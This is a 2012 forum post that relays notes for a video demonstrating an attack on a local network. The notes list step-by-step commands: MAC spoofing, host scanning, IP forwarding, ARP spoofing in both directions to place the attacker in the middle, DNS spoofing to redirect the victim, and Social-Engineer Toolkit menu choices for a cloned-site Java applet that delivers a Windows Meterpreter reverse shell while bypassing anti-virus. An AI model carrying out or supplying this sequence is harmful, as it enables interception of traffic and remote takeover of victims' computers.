Nytro Posted January 14, 2012 Report Posted January 14, 2012 [h=4]Using Set's Java Applet Attack To Bypass Anti-Virus Software[/h] Description: Demonstration of SET's Java Applet Attack to bypass anti-virus software and obtain Meterpreter shell.Video Notes:ifconfig (View NIC information)macchanger -a eth0 (Change MAC Address)nmap -sn -n 10.10.100.* | grep Nmap (Scan for hosts)route -n (Identify the Gateway)10.10.100.254 (Gateway)10.10.100.30 (Attacker)10.10.100.16 (Victim)ping 10.10.100.16 (Verify Connectivity)echo 1 > /proc/sys/net/ipv4/ip_forward (Enables IP forwarding)cat /proc/sys/net/ipv4/ip_forward (View status of IP forwarding)pico dns (Create DNS table for dnsspoof)arpspoof -i eth0 -t 10.10.100.254 10.10.100.16 (Man in the middle attack part 1)arpspoof -i eth0 -t 10.10.100.16 10.10.100.254 (Man in the middle attack part 2)dnsspoof -i eth0 -f dns (Website Redirect)SET menu1 -> Social Engineering Attacks2 -> Website Attack Vectors1 -> Java Applet Attack Method2 -> Website Cloner13-> ShellCodeExec Alphanum Shellcode1 -> Windows Meterpreter Reverse TCPI apologize in advance for the poor editing and TTS narrator. My next videos should be better.ThanksSursa: Using Set's Java Applet Attack To Bypass Anti-Virus Software Quote